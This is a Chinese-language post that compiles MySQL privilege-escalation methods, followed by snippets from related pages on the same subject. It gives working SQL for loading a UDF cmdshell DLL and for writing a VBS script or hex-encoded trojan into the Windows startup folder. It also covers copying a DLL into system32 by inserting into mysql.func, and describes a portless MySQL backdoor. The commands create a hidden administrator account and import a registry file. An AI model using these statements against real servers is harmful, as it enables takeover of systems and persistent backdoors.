mysql提权语句归纳如下:
一 UDF提权
这类提权方法我想大家已经知道了,我大致写一下,具体语句如下:
create function cmdshell returns string soname ’udf.dll’
select cmdshell(’net user iis_user 123!@#abcABC /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
二 VBS启动项提权
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
先在webshell里连接上数据库,建立表,将VBS写入表里,然后导入启动项,如果UDF提权不行的话也可以尝试下这个方法,前提是要有ROOT权限,后面有个,0表示不弹出CMD窗口,安静的运行。
还可以这样写:
create table a (cmd BLOB);
insert into a values (CONVERT(木马的16进制代码,CHAR));
select * from a into dumpfile ’C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe’
drop table a;
执行前3条语句,就可以将木马写进启动里了,前提是木马一定要是16进制,还有就是路径要是\\,因为windows会自动过滤掉一个\
三 Linx Mysql BackDoor提权
Linx Mysql Door
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,该后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,这个后门在Windows下拥有与Mysql一样的系统权限,从而巧妙的实现了无端口,无进程,无服务的穿墙木马.
用法:将Mysql.php传到PHP服务器上,点击"自动安装Mysql BackDoor",然后直接执行命令即可
四,MIX.DLL提权
create table temp_mix(abc longblob);
insert into temp_mix values(load_file(’D:\\web\\udf.dll’));
select * from temp_mix into dumpfile ’C:\\Windows\\system32\\udf.dll’;
create function MyCmd returns string soname ’udf.dll’;
select MyCmd(’net user’);
drop table if exists temp_mix;
前三句主要目的是把DLL放到系统目录.第4句建立函数.然后就可以执行系统命令了。而最容易出问题的就是第4句:can’t open shared library ’udf.dll’(error 2);就说下他.
先前的时候.有次提权.可以建立函数.也忘了什么原因了.需要重新建下这个函数.首先百度了下.说得是:drop function MyCmd; 就可以删到已经建立的函数.测试了下.发现还是不行.然后继续找的时候.说这是MYSQL的一个BUG.可以执行如下语句:delete from mysql.func where name=’MyCmd’;.测试了下成功了.前天再次盯着屏幕上的can’t open shared library ’udf.dll’.又看到了这条delete语句.我们知道delete就是删除.是删的表里的东西.删下表就可以删了函数了?那反过来.建立函数是不是就是往表里插入一条新记录?而且是mysql.func.也就是mysql这个库里的func表.呵呵.看名字也象.测试一番后.得出如下结果:
在提权的时候.建立函数显示can’t open shared library ’udf.dll’.就干脆跳过这句.执行另外一句.或者说.把第4句换成:insert into mysql.func values(’MyCmd’,0,’udf.dll’,’function’);.说下func这个表的结构:4 列.name,return,dl,fun.第二列和第四列的名字记不大清楚了.但意思一样.有兴趣可以自己select * from func;下就知道了.第一列就是新建函数的名字.字符串.第二列是返回值.填0.第三列dl指函数所在的dll名字.字符串类型.这里为我们导到系统目录里的dll名.不一定是udf.dll.只要跟你导出的一样就行.第四列作用不清楚.但是填上funciton这个字符串就能用.应该是指这个是个函数吧...因为这只是个插入操作.所以只要是root.应该不会有错误的.后面的就一样了.select MyCmd(’whoami’);.但是别急!这里有个前提:需要重启MYSQL..我对MYSQL不了解.但是重启后新建的函数绝对可用.貌似有别的办法可以达到同样的效果.好象是flush.但是具体flush哪里.就不知道了.不过不是权限.也不是func表.试过了.而且MYSQL下.搜了很久也没找到root在MYSQL下通过命令重启的.总有种感觉.不用重启的.哪位对MYSQL熟悉的看到后如果知道有什么命令告诉小弟下...
分享到:
相关推荐
在网络安全领域,"mysql提权udf"常常指的是利用UDF进行权限提升的技巧,这对于渗透测试和系统安全评估至关重要。 MySQL提权通常涉及以下步骤: 1. **UDF编译与注入**:首先,你需要编写或找到一个能够执行系统命令...
本文将详细阐述 MySQL 提权的四种常见方法:UDF 提权、VBS 提权、WebShell 提权以及 Linux 下的 MySQL Backdoor 提权。 #### 一、UDF 提权 **UDF(User Defined Function)提权** 是指通过创建自定义函数来执行...
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
在IT领域,尤其是在数据库管理与安全方面,“mysql用户root提权”是一个重要的议题,涉及到数据库权限管理和潜在的安全风险。从给定的文件标题、描述、标签以及部分内容来看,本话题聚焦于MySQL数据库环境下如何对...
本篇将详细介绍如何利用UDF库来实现MySQL的提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
【提权技术详解】 提权技术,通常在网络安全领域中被提及,指的是攻击者通过获取系统中的较低权限,然后利用漏洞或策略缺陷提升自身权限,最终达到控制系统或获取敏感信息的目的。提权技术涵盖多种技术和策略,包括...
【压缩包子文件的文件名称列表】:“Phpmyadmin提权漏洞演示.exe”可能是一个执行文件,包含了一个模拟的环境或工具,用于演示如何检测和利用Phpmyadmin的提权漏洞。这个文件可能包含了模拟攻击的步骤、漏洞利用的...
"sql注入提权拿服务器"这个话题涉及到利用SQL注入漏洞来提升权限并最终控制服务器的过程。在这个过程中,攻击者通常会经过几个关键步骤来实现目标。 首先,**发现SQL注入漏洞**。这通常通过输入特定的测试数据来...
标题“mssql,mysqll注入语法.zip_KMF_security_提权”表明这个压缩包文件主要关注的是SQL注入攻击相关的知识,特别是针对Microsoft SQL Server(mssql)和MySQL(通常拼写为mysql)数据库系统的安全问题。...
2. **exploit/multi/mysql/mysql_udf_payload**:该插件专注于利用MySQL的User Defined Function (UDF)机制,通常用于root权限启动的MySQL服务,以实现root级别的提权攻击。 3. **exploit/windows/mysql/mysql_mof*...
- **尝试使用 MySQL UDF 提权**:由于直接通过 MSSQL 的 `xp_cmdshell` 遭遇权限问题,尝试切换到 MySQL 并使用 UDF 提权,但同样未取得成功。 - **百度搜索解决方案**:在网络上搜索相关解决方案,但并未找到有效...
4. **MySQL函数提权**: 在描述中提到的“建立函数提权”可能是指利用MySQL的存储过程或函数来获取更高的权限。在某些情况下,通过创建具有特定权限的自定义函数,攻击者可能能绕过常规的安全限制,这在安全领域被...
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
例如,在MySQL数据库中,管理员可以限制root账户只能执行某些特定的操作,如select、insert、update,而不能执行drop、delete等破坏性操作。类似的权限控制策略在MSSQL数据库中也是存在的。即使sa作为最高权限的账户...
文章着重讨论了两个关键知识点:payload的免杀技术以及非交互式MySQL提权。 1. **Payload免杀技术** - 在面对具有反病毒软件(基于特征、行为和云查杀)的目标系统时,需要创建不易被检测的payload。 - 分离免杀...
这是一个转换好的十六进制编码文本文件,之需要把它导出XXX.DLL即可执行命令 。 函数名 sys_eval() 导出语句自己查。
load_file()函数在SQL注入攻击中扮演着至关重要的角色,不仅能够泄露服务器的关键信息,还可能作为提权的跳板。因此,对数据库的安全配置和权限管理至关重要,限制不必要的FILE权限,确保只有受信任的用户才能执行...
在获得 MySQL 数据库的访问权后,我们可以使用自定义函数来提权。我们使用 do_system 函数来执行系统命令,例如 chmod u+s /usr/bin/find,以便在系统中添加 SUID 权限。结果,我们成功地提权了 SYSTEM 权限。 ...
知识点:Windows 提权可以分为纵向提权和横向提权,常见的提权方法包括系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB 中间件漏洞提权、DLL 劫持提权、滥用高危权限令牌提权、第三方...
- 提权方法:不选择端口转发,而是采用非交互式下的MySQL UDF(用户自定义函数)提权,利用`-e`参数执行SQL语句,避免打开新的窗口,保持session的稳定性。 4. **MySQL非交互式提权注意事项**: - 使用`-e`参数时...